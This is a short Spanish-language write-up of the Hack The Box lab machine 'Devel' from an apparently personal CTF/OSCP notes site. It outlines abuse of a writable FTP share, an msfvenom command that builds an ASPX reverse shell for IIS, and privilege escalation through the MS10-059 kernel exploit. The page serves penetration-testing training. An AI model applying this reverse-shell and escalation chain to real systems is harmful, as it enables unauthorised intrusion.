xerosec
  • whoami
  • CTF Checklists
    • Enumeración inicial
    • Vectores de ataque
    • Escalada de privilegios
    • Active Directory
  • Writeups
    • YouTube - Walkthroughs en español
    • Hack The Box
      • Nibbles
      • Blocky
      • Irked
      • Traverxec
      • Cronos
      • Active
      • Devel
      • Chatterbox
      • Secnotes
    • TryHackMe
      • Hacking with Powershell
      • Enterprise
      • Chill Hack
      • Mr Robot CTF
      • Daily Bugle
      • Rootme
      • Attacktive Directory
      • Retro
  • Apuntes y recursos OSCP
    • Técnicas fundamentales
    • Linux
      • Linux Basics
      • Linux Privesc
    • Windows
      • Windows Basics
      • Windows Privesc
      • Ataques MITM
      • Enumeración Post-Explotación
      • Ataques Post-Explotación
  • Recursos
    • Plataformas de aprendizaje
Con tecnología de GitBook
En esta página
  • Resumen de la resolución
  • Habilidades adquiridas
  • Comandos y herramientas destacables
  • Walkthrough en YouTube:
  1. Writeups
  2. Hack The Box

Devel

AnteriorActiveSiguienteChatterbox

Última actualización hace 1 año

Resumen de la resolución

  • Máquina con servicio FTP expuesto con permisos de escritura

  • Creación de código malicioso .aspx con MSFVenom para ejecutarlo en un servidor web Microsoft IIS 7.5

  • Escalada de privilegios con Kernel Exploit MS10-059 (Chimichurri)

Habilidades adquiridas

  • Al subir un binario por FTP se debe usar el comando bin para que sea interpretado como tal

Comandos y herramientas destacables

  • Búsqueda recursiva desde Windows cmd

where /r c:\ iisstart.htm

  • Reverse Shell aspx con MSFVenom

msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=443 -f aspx > exploit.aspx

Walkthrough en YouTube:

Pendiente

LogoGitHub - SecWiki/windows-kernel-exploits: windows-kernel-exploits Windows平台提权漏洞集合GitHub
Repositorio WIndows Kernel Exploits